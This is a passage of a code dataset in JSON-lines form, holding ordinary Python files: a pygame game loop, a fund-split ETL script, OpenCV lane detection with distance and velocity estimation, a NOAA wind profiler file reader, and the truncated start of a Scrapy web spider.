core.role import Role\nfrom core.npc import Npc\nfrom core.map import Map\n\nif __name__ == '__main__':\n pygame.init()\n pygame.display.set_caption('World of soul')\n screen = pygame.display.set_mode((800, 600), DOUBLEBUF, 32)\n fps_clock = pygame.time.Clock()\n player = Role(screen)\n largemap = Map(screen)\n sysnpc = Npc(screen)\n\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n exit()\n start = fps_clock.tick()\n #pygame.mixer.music.set_volume(gl.MUSIC['volume'])\n #if not pygame.mixer.music.get_busy():\n # pygame.mixer.music.load(gl.MUSIC['name'][gl.MUSIC['index']])\n # pygame.mixer.music.play()\n mouse.get()\n keyboard.get()\n if len(gl.DIRECTION) > 0:\n direction = gl.DIRECTION.pop()\n player.set_direction(direction)\n if direction == 0:\n gl.ROLE['x'] -= 10\n gl.ROLE['y'] -= 10\n elif direction == 1:\n gl.ROLE['y'] -= 10\n elif direction == 2:\n gl.ROLE['x'] += 10\n gl.ROLE['y'] -= 10\n elif direction == 3:\n gl.ROLE['x'] -= 10\n elif direction == 4:\n gl.ROLE['x'] += 10\n elif direction == 5:\n gl.ROLE['x'] -= 10\n gl.ROLE['y'] += 10\n elif direction == 6:\n gl.ROLE['y'] += 10\n elif direction == 7:\n gl.ROLE['x'] += 10\n gl.ROLE['y'] += 10\n else:\n fsm.disable('role','move')\n largemap.draw()\n sysnpc.draw()\n player.draw()\n pygame.display.flip()\n end = fps_clock.tick()\n speed = end - start\n fps_clock.tick(12)\n","sub_path":"src/pygame/wos.py","file_name":"wos.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"289231587","text":"import datetime as dt\nimport pandas as pd\nfrom sqlalchemy import and_\nfrom sqlalchemy.orm import sessionmaker\nfrom utils.database import io, config as cfg\nfrom utils.algorithm import etl\nfrom utils.database.models.crawl_public import DFundSplit\nfrom utils.database.models.base_public import IdMatch, FundInfo, FundSplit\n\n_engine_wt = cfg.load_engine()[\"2Gbp\"]\n_db_session = sessionmaker(bind=_engine_wt)\n_session = _db_session()\nUPDATE_TIME = etl.update_time[\"all\"]\n\n_entities_map = [\n (FundInfo.fund_id, FundSplit.fund_id), (FundInfo.fund_name, FundSplit.fund_name), (DFundSplit.data_source, FundSplit.data_source),\n (DFundSplit.statistic_date, FundSplit.statistic_date), (DFundSplit.split_date, FundSplit.split_date),\n (DFundSplit.split_ratio, FundSplit.split_ratio)\n]\n_input_entities = [x[0] for x in _entities_map]\n_map_entities = [x[1] for x in _entities_map]\n\n_derivative_entities = []\n_output_entities = [*_map_entities, *_derivative_entities]\n\n\ndef fetch_multisource_split(update_time):\n \"\"\"\n Fetch records of DOrgInfo table where record update time >= `update_time`\n Args:\n update_time: record update time\n\n Returns:\n pandas.DataFrame\n \"\"\"\n query_fnv = _session.query(IdMatch).join(\n FundInfo, and_(IdMatch.id_type == 1, IdMatch.matched_id == FundInfo.fund_id)\n ).join(\n DFundSplit, and_(IdMatch.id_type == 1, IdMatch.source_id == DFundSplit.fund_id, IdMatch.data_source == DFundSplit.data_source)\n ).filter(\n and_(DFundSplit.update_time >= update_time, IdMatch.is_used == 1)\n ).with_entities(\n *_input_entities\n )\n df = pd.DataFrame(query_fnv.all())\n df.columns = [x.name for x in _map_entities]\n df.index = df[[FundInfo.fund_id.name, FundSplit.statistic_date.name]]\n return df\n\n\ndef transform():\n df = fetch_multisource_split(UPDATE_TIME)\n\n df_020001 = df.ix[df[FundInfo.data_source.name] == \"020001\"]\n df_020002 = df.ix[df[FundInfo.data_source.name] == \"020002\"]\n df_020003 = df.ix[df[FundInfo.data_source.name] == \"020003\"]\n\n result = df_020002.join(\n df_020001, how=\"outer\", rsuffix=\"_020001\"\n ).join(\n df_020003, how=\"outer\", rsuffix=\"_020003\"\n )[df_020002.columns].fillna(df_020001).fillna(df_020003)\n\n std_rec_date = {}\n for idx in df_020002.index:\n std_rec_date.setdefault(idx[0], set()).add(idx[1])\n std_split = {}\n for idx in df_020002.index:\n std_split[idx] = float(df_020002.ix[[idx], FundSplit.split_ratio.name][idx])\n\n drop_list = []\n result_not_main = result.ix[result[FundSplit.data_source.name] != \"020002\"]\n for idx in result_not_main.index:\n fid, rdate = result_not_main.ix[[idx]].index.tolist()[0]\n for tolerant in [0, 1, -1, 2, -2]:\n date_possible = rdate + dt.timedelta(tolerant)\n if date_possible in std_rec_date.get(fid, set()):\n val = float(result_not_main.ix[[idx], FundSplit.split_ratio.name][idx])\n val_std = std_split[(fid, date_possible)]\n length_min = min(len(str(val).split(\".\")[1]), len(str(val_std).split(\".\")[1]))\n if round(val, length_min) == round(val_std, length_min):\n drop_list.append(idx)\n result = result.drop(drop_list)\n\n return result\n\n\ndef main():\n io.to_sql(FundSplit.__tablename__, _engine_wt, transform())\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"SCRIPT/MUTUAL/etl/fund_split.py","file_name":"fund_split.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"254317874","text":"from collections import defaultdict\nfrom math import floor, sqrt, atan2, cos, sin\n\nimport cv2\nimport numpy as np\n\n\nclass LaneDetection:\n \"\"\"\n Lane_Detection class basically detects the left and right line of an image\n \"\"\"\n\n def __init__(self, resized_dims, cropped=True):\n self.cropped = cropped\n self.lines = None\n self.resized_dims = resized_dims\n self.roi = [(0, self.resized_dims[1]), (self.resized_dims[0] / 2, 0),\n (self.resized_dims[0], self.resized_dims[1]), ]\n\n def region_of_interest(self, grey_scale_bool, img, vertices):\n \"\"\"\n Masks a ROI in the image in order to reduce the area where detecting the lane\n \"\"\"\n # Define a blank matrix that matches the image height/width.\n mask = np.zeros_like(img)\n\n # Create a match color with the same color channel counts.\n # If we are using grey_scale,just one color mask\n if grey_scale_bool:\n match_mask_color = 255\n\n else:\n # Retrieve the number of color channels of the image.\n channel_count = img.shape[2]\n match_mask_color = (255,) * channel_count\n\n # Fill inside the polygon\n cv2.fillPoly(mask, vertices, match_mask_color)\n\n # Returning the image only where mask pixels match\n masked_image = cv2.bitwise_and(img, mask)\n return masked_image\n\n def makeLinePoints(self, y1, y2, line):\n \"\"\"\n Convert a line represented in slope and intercept into pixel points\n :param y1: to compute the (x1, y1) point from line\n :param y2: to compute the (x1, y1) point from line\n :param line: slope and intercept that define the line\n :return:\n \"\"\"\n if line is None:\n return None\n intercept, slope = line\n\n # cv2.line requires integers\n x1 = int((y1 - intercept) / slope)\n x2 = int((y2 - intercept) / slope)\n y1 = int(y1)\n y2 = int(y2)\n return (x1, y1), (x2, y2)\n\n def average_slope_intercept(self, lines):\n \"\"\"\n Reduce all the lines detected into a combination of all of them, which are right and left lines.\n :param lines: bunch of lines detected from the Hough Filter\n :return: the left and right mostly accurate lane\n \"\"\"\n avgLines = defaultdict(list)\n weights = defaultdict(list)\n for line in lines:\n for x1, y1, x2, y2 in line:\n if x2 == x1:\n continue # Ignore a vertical line\n slope = (y2 - y1) / float(x2 - x1)\n slope = floor(slope * 10) / 10\n\n # Discarting impossible slopes\n if slope == 0 or abs(slope) < 0.5 or abs(slope) > 2.5:\n continue # Avoid division by zero\n\n intercept = y1 - slope * x1\n length = np.sqrt((y2 - y1) ** 2 + (x2 - x1) ** 2)\n avgLines[slope].append((slope, intercept))\n weights[slope].append(length)\n\n keys = []\n for key in sorted(avgLines):\n keys.append(key)\n\n newAvgLines = defaultdict(list)\n newWeights = defaultdict(list)\n for i in range(1, len(keys)):\n if abs(keys[i] - keys[i - 1]) <= .1:\n slope = (keys[i] + keys[i - 1]) / 2.0\n for (s, intercept) in avgLines[keys[i]]:\n newAvgLines[slope].append((s, intercept))\n for (s, intercept) in avgLines[keys[i - 1]]:\n newAvgLines[slope].append((s, intercept))\n for (l) in weights[keys[i]]:\n newWeights[slope].append((l))\n for (l) in weights[keys[i - 1]]:\n newWeights[slope].append((l))\n else:\n if (i == 1):\n slope = keys[i - 1]\n for (s, intercept) in avgLines[keys[i - 1]]:\n newAvgLines[slope].append((s, intercept))\n for (l) in weights[keys[i - 1]]:\n newWeights[slope].append((l))\n slope = keys[i]\n for (s, intercept) in avgLines[keys[i]]:\n newAvgLines[slope].append((s, intercept))\n for (l) in weights[keys[i]]:\n newWeights[slope].append((l))\n\n left = {}\n right = {}\n values_right = {}\n values_left = {}\n for key in newAvgLines:\n slope_mean = np.mean(list(map(lambda x: x[0], newAvgLines[key])))\n intercept_mean = np.mean(list(map(lambda x: x[1], newAvgLines[key])))\n if slope_mean > 0:\n left[slope_mean] = intercept_mean\n values_left[slope_mean] = np.size(newWeights[key])\n\n else:\n right[slope_mean] = intercept_mean\n values_right[slope_mean] = np.size(newWeights[key])\n\n if len(values_right) > 0:\n def_slope_right = np.dot(list(values_right.keys()), list(values_right.values())) / np.sum(\n list(values_right.values()))\n def_intercept_right = np.dot(list(right.values()), list(values_right.values())) / np.sum(\n list(values_right.values()))\n else:\n def_slope_right = None\n def_intercept_right = None\n\n if len(values_left) > 0:\n def_slope_left = np.dot(list(values_left.keys()), list(values_left.values())) / np.sum(\n list(values_left.values()))\n def_intercept_left = np.dot(list(left.values()), list(values_left.values())) / np.sum(\n list(values_left.values()))\n else:\n def_slope_left = None\n def_intercept_left = None\n\n return (def_intercept_left, def_slope_left), (def_intercept_right, def_slope_right)\n\n def laneLines(self, image, lines):\n \"\"\"\n Get the points to draw the lines in the image\n :param image: image where we will draw the line\n :param lines: lines detected from the Hough Transformation\n :return: right and left lines defined by 2 points in determined Y coordinates\n \"\"\"\n y1 = image.shape[0] # Bottom of the image\n y2 = image.shape[0] * 0.5 # Slightly lower than the middle\n\n leftLane, rightLane = self.average_slope_intercept(lines)\n if leftLane[0] != None:\n leftLine = self.makeLinePoints(y1, y2, leftLane)\n else:\n leftLine = None\n\n if rightLane[0] != None:\n rightLine = self.makeLinePoints(y1, y2, rightLane)\n else:\n rightLine = None\n return leftLine, rightLine\n\n def drawLaneLines(self, image, lines, color=[0, 255, 0], thickness=20):\n \"\"\"\n :param image: image where we draw the detected lines\n :param lines: 2 points left and right lines definition\n :param color: Color for the drawing --> Default: Blue\n :param thickness: Thick of the lines drawn --> Default: 20\n :return: the image where the lines are draw into as coordinate points\n \"\"\"\n # Make a separate image to draw lines and combine with the orignal later\n lineImage = np.zeros_like(image)\n\n for line in lines:\n if line is not None:\n (x1, y1), (x2, y2) = line\n image = cv2.line(image, (x1, y1), (x2, y2), color, thickness)\n # IF WANT THE LINES TO BE DRAWN SMOOTHLY\n # return lines, cv2.addWeighted(image, 1.0, lineImage, 0.95, 0.0)\n return lines, image\n\n def process_image(self, image):\n \"\"\"\n Processes the frame passed as parameter to detect the lines left and right of the lane\n :param image: image where the lines are detected from\n :return: image with the detected lines drawn and the actual lines detected\n \"\"\"\n\n self.frame = image\n original_img = np.copy(image)\n\n # Crop image with the region of interest\n if self.cropped:\n cropped_image = self.region_of_interest(False, original_img, np.array([self.roi], np.int32), )\n hsv = cv2.GaussianBlur(cropped_image, (5, 5), 0)\n else:\n hsv = cv2.GaussianBlur(original_img, (5, 5), 0)\n\n low_white = np.array([150, 150, 150])\n up_white = np.array([255, 255, 255])\n\n mask = cv2.inRange(hsv, low_white, up_white)\n\n edges = cv2.Canny(mask, 50, 150)\n lines = cv2.HoughLinesP(edges, rho=6, theta=np.pi / 60, threshold=160, lines=np.array([]), minLineLength=40,\n maxLineGap=25)\n if lines is None:\n return [], self.frame\n else:\n (left_lane, right_lane) = self.laneLines(self.frame, lines)\n lines_def = []\n if left_lane is not None:\n lines_def.append(left_lane)\n if right_lane is not None:\n lines_def.append(right_lane)\n return self.drawLaneLines(self.frame, lines_def)\n\n\nclass Distance:\n def __init__(self, dimensions, fps, width=2.3, lines=None, visualize=False):\n self.fps = fps\n self.width = width\n self.lines = lines\n self.warpRatio =1\n self.visualize = visualize\n self.resized_dims = dimensions\n self.objects = {}\n\n def getRealDistances(self, centroid):\n \"\"\"\n Get the Distance in real world between the camera and the object\n :param box: coordinates for the box in the image\n :return: Distance X and Y between the object and the camera\n \"\"\"\n # We need to obtain the centroid of the box of the object obtained to compute distance from it However we\n # think it is more interesting to compute the distance from the lower edge of the bounding box (as it is the\n # nearest to the ground)\n object_cx, object_cy = centroid\n distX, distY = self.projectiveModel((object_cx, object_cy))\n return (distX, distY)\n\n def defineLine(self, points):\n \"\"\"\n Define a line by slope and intercept from two points\n :param points: 2 points of the line\n :return: slope and intercept for the line that cross both points\n \"\"\"\n (x1, y1), (x2, y2) = points\n slope = floor((y2 - y1) / float(x2 - x1) * 10) / 10\n intercept = y1 - slope * x1\n line = (intercept, slope)\n return line\n\n def projectiveModel(self, objectCentroids):\n \"\"\"\n Calculate Homogenous perspective to compute distances\n :param objectCentroids: centroid of the object bounding box coordinates\n :return: X and Y distance in meters of the object to the camera\n \"\"\"\n point = self.calculateWrappingPoint(np.array(objectCentroids))\n centroid_camera = self.calculateWrappingPoint(np.array((self.resized_dims[0] / 2, self.resized_dims[1])))\n dist_pixelsX = abs(point[0] - centroid_camera[0])\n dist_pixelsY = abs(point[1] - centroid_camera[1])\n return self.warpRatio * dist_pixelsX, self.warpRatio * dist_pixelsY\n\n def getVanishingPoint(self, lines):\n \"\"\"\n Computes the vanishing point for the lanes\n :param lines: left and right lines equations\n :return: point coordinates where left and right lines collide\n \"\"\"\n (intercept_left, slope_left), (intercept_right, slope_right) = lines\n vanishingPointX = (intercept_left - intercept_right) / (slope_right - slope_left)\n vanishingPointY = intercept_left + slope_left * vanishingPointX\n vanishingPoint = (vanishingPointX, vanishingPointY)\n return vanishingPoint\n\n def birdEyeTransformation(self, image, option=\"Vanishing Point\"):\n \"\"\"\n Homogenous transformtion using Bird's eye view from OpenCv\n :param image: image where applying the transformation\n :param image_size: dimension of the image\n :param option: the method to implemente the Bird Eye transformation : by the already detected lines [default] or by using the vanishing point\n :return: It gives the Matrix of perspectives, the ratio and the image transformed\n \"\"\"\n # Defining the inputs for the matrix\n (x1_l, y1_l), (x2_l, y2_l) = self.lines[0]\n (x1_r, y1_r), (x2_r, y2_r) = self.lines[1]\n IMAGE_W, IMAGE_H = self.resized_dims\n\n if option is None:\n # First approach: lane detection without vanishing point computation\n src = np.float32([[x1_l, y1_l], [x2_l, y2_l], [x1_r, y1_r], [x2_r, y2_r]])\n dst = np.float32([[0, IMAGE_H], [0, 0], [IMAGE_W, IMAGE_H], [IMAGE_W, 0]])\n\n elif option == \"Vanishing Point\":\n # Second approach: lane detection wit vanishing point computation\n left, right = self.defineLine(self.lines[0]), self.defineLine(self.lines[1])\n vanishingPoint = self.getVanishingPoint((left, right))\n warped_width = int(IMAGE_H * 0.15)\n top = vanishingPoint[1] + int(warped_width * 0.15)\n bottom = IMAGE_W + int(0.02 * IMAGE_W)\n\n def on_line(p1, p2, ycoord):\n return [p1[0] + (p2[0] - p1[0]) / float(p2[1] - p1[1]) * (ycoord - p1[1]), ycoord]\n\n p1 = [vanishingPoint[0] - warped_width / 2, top]\n p2 = [vanishingPoint[0] + warped_width / 2, top]\n p3 = on_line(p2, vanishingPoint, bottom)\n p4 = on_line(p1, vanishingPoint, bottom)\n src = np.float32([p1, p2, p3, p4])\n dst = np.float32([[0, 0], [IMAGE_W, 0], [IMAGE_W, IMAGE_H], [0, IMAGE_H]])\n\n self.M = cv2.getPerspectiveTransform(src, dst) # The transformation matrix\n self.Minv = cv2.getPerspectiveTransform(dst, src) # Inverse transformation\n\n # If we want to check accuracy of the method for bird eye transform point\n # self.checkAccuracy(src,dst)\n\n warped_img = cv2.warpPerspective(image, self.M, (IMAGE_W, IMAGE_H))\n if self.visualize == True:\n cv2.imshow(\"Bird Eye\", warped_img)\n\n self.pointLeft = self.calculateWrappingPoint((x1_l, y1_l))\n self.pointRight = self.calculateWrappingPoint((x1_r, y1_r))\n pixel_distance = abs(self.pointLeft[0] - self.pointRight[0])\n self.warpRatio = self.width / pixel_distance\n\n def calculateWrappingPoint(self, point):\n \"\"\"\n Calculate the coordinate in the bird's eye view of a point in the original image\n :param point: original image point\n :return: bird's eye image point\n \"\"\"\n point = np.append(point, 1)\n a = self.M.dot(point)\n if a[2] == 0:\n dst = (0,0)\n else:\n dst = a / a[2]\n return np.array([dst[0], dst[1]])\n\n def calculateCameraPoint(self, point):\n \"\"\"\n Calculate the coordinate in the camera's view of a bird's eye view point\n :param point: bird's eye image point\n :return: original image point\n \"\"\"\n point = np.append(point, 1)\n a = self.Minv.dot(point)\n if a[2] == 0:\n dst = (0,0)\n else:\n dst = a / a[2]\n return np.array([dst[0], dst[1]])\n\n def checkAccuracy(self, src, dst):\n \"\"\"\n Method to calculate the accuracy of the method to calculate the Transformation Matrix\n :param src: points to define the Matrix\n :param dst: points to output the Matrix\n :return: Accuracy of the perspective\n \"\"\"\n if self.acc is None:\n self.acc = []\n i = 0\n diff = []\n for point in src:\n acc = np.linalg.norm(dst[i] - self.calculateWrappingPoint(point))\n diff.append(acc)\n i += 1\n self.acc.append(np.mean(diff))\n print(\"Accuracy is: \" + str(np.mean(self.acc)))\n\n def makeLinePoints(self, y1, y2, line):\n \"\"\"\n Convert a line represented in slope and intercept into pixel points\n :param y1: to compute the (x1, y1) point from line\n :param y2: to compute the (x1, y1) point from line\n :param line: slope and intercept that define the line\n :return:\n \"\"\"\n if line is None:\n return None\n intercept, slope = line\n\n # cv2.line requires integers\n x1 = int((y1 - intercept) / slope)\n x2 = int((y2 - intercept) / slope)\n y1 = int(y1)\n y2 = int(y2)\n return (x1, y1), (x2, y2)\n\n def computeDistance(self, box):\n \"\"\"\n Returns de real distance of the object to the camera\n :param box: Coordinates of an object --> Bounding box: ((x1, y1), (x2, y2))\n :return: Real distance of the object to the camera\n \"\"\"\n # We can just compute the distance if both lines are detected:\n if len(self.lines) == 2:\n (x1, y1, x2, y2) = box\n # We are actually searching for a point in the center X and bottom Y of the bounding box (as we measure just in the track lane)\n point = ((x1+x2)/2, max(y1, y2))\n real_obj_coordinates = self.getRealDistances(point)\n real_distance = np.linalg.norm(real_obj_coordinates)\n return real_distance, real_obj_coordinates\n print(\"Real distance of the object can no be find as lines have not been detected\")\n\n def updateObject(self, id, boxes):\n \"\"\"\n Updates the self.objects variable. This variable just contains the last 10 bounding boxes of an object to compute velocities and directions\n :param id: id of the object which box is going to be updated\n :param boxes: coordinates of the new bounding box detected for the object\n \"\"\"\n # If object was never detected, initialize in dictionary of all objects detected\n past = self.objects.get(id)\n if past == None:\n self.objects[id] = []\n\n # In case the len of the object is 10, we need to update the oldest value with the ne one\n if len(self.objects[id]) == 10:\n del self.objects[id][0]\n\n # Save the box of the object detected for the last ten frames\n self.objects[id].append(boxes)\n\n def deleteObject(self, objectId):\n \"\"\"\n Deletes an object inside the class when it disappears\n :param objectId: ID of the object that has disappeared\n \"\"\"\n self.objects.pop(objectId, None)\n\n def computeAllDistances(self, image, lines, objects):\n \"\"\"\n Main function for Distance class. Return all distances to all objects detected in an image\n :param image: image where the image have been detected to\n :param lines: left and right line detected. Necessary to compute ratios and scalate to real life measurements\n :param objects: all the centroid of the bounding boxes for all the objects detected with their ID's\n :return: the distances to all the centroid bounding boxes with its determined ID's\n \"\"\"\n distances = {}\n coords = {}\n # Establish the new line\n if len(lines[0]) == 2:\n self.lines = lines\n\n if self.lines is None or len(self.lines) != 2:\n print(\"Lines not found, can not compute real distances.\")\n for id, boxes in objects.items():\n # Update the object list array of boxes\n self.updateObject(id, boxes)\n return None, None\n # Establish the new homogeneous perspective matrix\n try:\n self.birdEyeTransformation(image)\n except Exception as ex:\n print(\"Lines not found, can not compute real distances.\")\n for id, boxes in objects.items():\n # Update the object list array of boxes\n self.updateObject(id, boxes)\n return None, None\n\n for id, boxes in objects.items():\n # Update the object list array of boxes\n self.updateObject(id, boxes)\n # Compute the real distance for the specific object\n distances[id], coords[id] = self.computeDistance(boxes)\n\n return distances, coords\n\n def getCentroid(self, box):\n \"\"\"\n Returns the Centroid coordinates of an object.\n :param box: coordinates of the bounding box of an object --> Box\n :return:\n \"\"\"\n (x1, y1 , x2, y2) = box\n object_cx, object_cy = (x2 + x1) / 2, (y1 + y2) / 2\n return (object_cx, object_cy)\n\n\n def computeRelativeVelocity(self, objectId):\n \"\"\"\n Compute the relative velocity of the object making some mathematical calculus on the last 10 bounding boxes of\n the object detected. The calculus are made in the bird eye's view.\n :param objectId: ID to identify the object in our intern self.objects dictionary\n :return: vector of the velocity, given by the module and the angle of the direction.\n \"\"\"\n vectors = []\n boxes = self.objects[objectId]\n\n i=0\n if len(boxes) < 2:\n return None\n while i + 1 < len(boxes):\n # Transform all the the camera coordinates into the homogeneous perspective\n obj1 = self.calculateWrappingPoint(self.getCentroid(boxes[i]))\n obj2 = self.calculateWrappingPoint(self.getCentroid(boxes[i+1]))\n distance = [obj2[0] - obj1[0], obj2[1] - obj1[1]]\n # We normalize the vector\n dist_norm = sqrt(distance[0] ** 2 + distance[1] ** 2)\n vector_norm = dist_norm / self.fps\n angle = atan2(distance[1],distance[0])\n vectors.append((vector_norm, angle))\n i +=1\n # The output contains the module and angle for the Homogenous perspective\n return np.mean(np.array([norm[0] for norm in vectors])), np.mean(np.array([angle[1] for angle in vectors]))\n\n def getLast(self, objectId):\n \"\"\"\n Used to obrain the last Box update of the Object Id\n :param objectId: the object we are referring to\n :return: the most updated bounding box for the object\n \"\"\"\n list = self.objects[objectId]\n return list[len(list)-1]\n\n def computeVelocity(self, objectId, velocity_cam):\n \"\"\"\n Compute the absolut velocity of the object taking into account the camera velocity\n :param objectId: ID to identify the object in our intern self.objects dictionary\n :param velocity_cam: velocity of the user\n :return: absolute velocity of the object\n \"\"\"\n # Relative velocity that contains the module and angle for the Homogenous perspective\n orig_centroid = self.getCentroid(self.getLast(objectId))\n relative_object_velocity = self.computeRelativeVelocity(objectId)\n if relative_object_velocity is None:\n return None\n\n # Absolut velocity of the objects in the Homogenous perspective in vector coordinates\n absolute_object_velocity = self.final_point(velocity_cam, relative_object_velocity, factor=1/100)\n\n # Coordinates of the original centroid into the Bird's Eye View\n transformed_point =self.calculateWrappingPoint(orig_centroid)\n\n # Last point of the velocity array inside the Bird Eye's View\n final_point = self.final_point(transformed_point, absolute_object_velocity, factor = 1)\n\n #Last point of the velocity array inside the Camera's perspective\n cam_abs_velocity = self.calculateCameraPoint(final_point)\n\n # Computing the velocity array\n velocity = int(cam_abs_velocity[0] - orig_centroid[0]), int(cam_abs_velocity[1] - orig_centroid[1])\n\n # Computing the angle and the norm of the velocity\n angle = atan2(velocity[1], velocity[0])\n norm = sqrt(velocity[0] ** 2 + velocity[1] ** 2)\n return (norm, angle)\n\n\n def computeAllVelocities(self, objectIds, cameraVelocity =25):\n \"\"\"\n Return all velocities to all objects detected in an image\n :param objectIds:all the objects IDs\n :return: the velocity of all objects which their corresponding IDs\n \"\"\"\n velocities = {}\n vector_camera = self.getCameraVelocity(cameraVelocity)\n for id in objectIds:\n # Compute the velocities for each object\n velocities[id] = self.computeVelocity(id, vector_camera)\n return velocities\n\n def getCameraVelocity(self, cameraVelocity):\n \"\"\"\n Set the camera velocity vector. Take into account that it will always have the perpendicular direction to width of camera (0,1)*module\n :param cameraVelocity: modul of the velocity by default (if location used) or (norm, angle) of all mean static velocities obtained\n :return: vector of camera velocity\n \"\"\"\n # If its only the module\n if type(cameraVelocity) == int:\n return (0, -1 * cameraVelocity)\n # If it contains module and norm, which means it is computed by static:\n else:\n return self.final_point((0,0),(-1* cameraVelocity[0], cameraVelocity[1]), factor=1/100)\n\n def drawCameraVector(self,camera_velocity_static):\n \"\"\"\n Used to draw the velocity array of the camera\n :param camera_velocity_static: velocity array as coordinates in the homogenous view\n :return: initial point of the camera and final point. Used to draw the arrow\n \"\"\"\n # We will also draw, in the camera view, the absolute velocity arrow for the camera.\n camera_abs_vel = self.getCameraVelocity(camera_velocity_static)\n initial_point_camera = (int((self.pointLeft[0] + self.pointRight[0]) / 2), int(self.resized_dims[1]))\n final_point_camera = (initial_point_camera[0] + camera_abs_vel[0], initial_point_camera[1] + camera_abs_vel[1])\n camera_array = self.calculateCameraPoint(final_point_camera)\n return initial_point_camera,(int(camera_array[0]), int(camera_array[1]))\n\n def final_point(self, point, velocity, factor=None):\n \"\"\"\n From an initial point computes the velocity to the next point where should be placed if the velocity persits\n :param point: initial centroid of the object\n :param velocity: velocity of the object in this determined moment\n :return: output\n \"\"\"\n if factor is None:\n factor = self.warpRatio\n norm, angle = velocity\n if factor == 0:\n return (point[0], point[1])\n x_mod = norm*cos(angle) / factor\n y_mod = norm*sin(angle) / factor\n return (point[0]+x_mod, point[1]+y_mod)\n","sub_path":"Extras/MovementEstimators.py","file_name":"MovementEstimators.py","file_ext":"py","file_size_in_byte":26416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"600746046","text":"\"\"\"\nModules for reading in NOAA PSL data.\n\"\"\"\n\nimport datetime as dt\n\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\n\n\ndef read_psl_wind_profiler(filename, transpose=True):\n \"\"\"\n Returns `xarray.Dataset` with stored data and metadata from a user-defined\n NOAA PSL wind profiler file.\n\n Parameters\n ----------\n filename : str\n Name of file(s) to read.\n transpose : bool\n True to transpose the data.\n\n Return\n ------\n obj_low : Xarray.dataset\n Standard Xarray dataset with the data for low mode\n obj_high : Xarray.dataset\n Standard Xarray dataset with the data for high mode.\n\n \"\"\"\n # read file with pandas for preparation.\n df = pd.read_csv(filename, header=None)\n\n # Get location of where each table begins\n index_list = df[0] == ' CTD'\n idx = np.where(index_list)\n\n # Get header of each column of data.\n column_list = list(df.loc[9][0].split())\n\n beam_vars = ['RAD', 'CNT', 'SNR', 'QC']\n for i, c in enumerate(column_list):\n if c in beam_vars:\n if column_list.count(c) > 2:\n column_list[i] = c + '1'\n elif column_list.count(c) > 1:\n column_list[i] = c + '2'\n elif column_list.count(c) > 0:\n column_list[i] = c + '3'\n\n # Loop through column data only which appears after 10 lines of metadata.\n # Year, Month, day, hour, minute, second, utc offset\n low = []\n hi = []\n for i in range(idx[0].shape[0] - 1):\n # index each table by using the idx of when CTD appears.\n # str split is use as 2 spaces are added to each data point,\n # convert to float.\n date_str = df.iloc[idx[0][i] + 3]\n date_str = list(filter(None, date_str[0].split(' ')))\n date_str = list(map(int, date_str))\n # Datetime not taking into account the utc offset yet\n time = dt.datetime(\n 2000 + date_str[0], date_str[1], date_str[2], date_str[3],\n date_str[4], date_str[5])\n\n mode = df.iloc[idx[0][i] + 7][0]\n mode = int(mode.split(' ')[-1])\n\n df_array = np.array(\n df.iloc[idx[0][i] + 10:idx[0][i + 1] - 1][0].str.split(\n r'\\s{2,}').tolist(), dtype='float')\n df_add = pd.DataFrame(df_array, columns=column_list)\n df_add = df_add.replace(999999.0, np.nan)\n\n xr_add = df_add.to_xarray()\n xr_add = xr_add.swap_dims({'index': 'height'})\n xr_add = xr_add.reset_coords('index')\n xr_add = xr_add.assign_coords(\n {'time': np.array(time), 'height': xr_add['HT'].values})\n\n if mode < 1000.:\n low.append(xr_add)\n else:\n hi.append(xr_add)\n\n obj_low = xr.concat(low, 'time')\n obj_hi = xr.concat(hi, 'time')\n\n # Adding site information line 1\n site_loc = df.iloc[idx[0][0]]\n site_list = site_loc.str.split(r'\\s{2}').tolist()\n site = site_list[0][0].strip()\n\n obj_low.attrs['site_identifier'] = site\n obj_hi.attrs['site_identifier'] = site\n\n # Adding data type and revision number line 2.\n rev = df.loc[idx[0][0] + 1]\n rev_list = rev.str.split(r'\\s{3}').tolist()\n rev_array = np.array(rev_list[0])\n\n obj_low.attrs['data_type'] = rev_array[0].strip()\n obj_hi.attrs['data_type'] = rev_array[0].strip()\n obj_low.attrs['revision_number'] = rev_array[1].strip()\n obj_hi.attrs['revision_number'] = rev_array[1].strip()\n\n # Adding coordinate attributes line 3.\n coords = df.loc[idx[0][0] + 2]\n coords_list = coords.str.split(r'\\s{2,}').tolist()\n coords_list[0].remove('')\n coords_array = np.array(coords_list[0], dtype='float32')\n\n obj_low.attrs['latitude'] = np.array([coords_array[0]])\n obj_hi.attrs['latitude'] = np.array([coords_array[0]])\n obj_low.attrs['longitude'] = np.array([coords_array[1]])\n obj_hi.attrs['longitude'] = np.array([coords_array[1]])\n obj_low.attrs['altitude'] = np.array([coords_array[2]])\n obj_hi.attrs['altitude'] = np.array([coords_array[2]])\n\n # Adding azimuth and elevation line 9\n az_el = df.loc[idx[0][0] + 8]\n az_el_list = az_el.str.split(r'\\s{2,}').tolist()\n az_el_list[0].remove('')\n az_el_array = np.array(az_el_list[0])\n az = []\n el = []\n for i in az_el_array:\n sep = i.split()\n az.append(sep[0])\n el.append(sep[1])\n az_array = np.array(az, dtype='float32')\n el_array = np.array(el, dtype='float32')\n\n obj_low.attrs['azimuth'] = az_array\n obj_hi.attrs['azimuth'] = az_array\n obj_low.attrs['elevation'] = el_array\n obj_hi.attrs['elevation'] = el_array\n\n if transpose:\n obj_low = obj_low.transpose()\n obj_hi = obj_hi.transpose()\n\n return obj_low, obj_hi\n","sub_path":"act/io/noaapsl.py","file_name":"noaapsl.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"315329359","text":"# -*- coding: utf-8 -*-\n\n\nimport scrapy\nfrom ..items import CarItem\nfrom scrapy_splash import SplashRequest\nimport re\nimport time\nfrom .. import autohome\nimport demjson\n\nscript = \"\"\"\nfunction main(splash)\n splash.images_enabled = false\n splash:go(\"https://www.autohome.com.cn\")\n splash:wait(5)\nend\n\"\"\"\n\n\nclass CarSpider(scrapy.Spider):\n name = \"car\"\n allowed_domains = 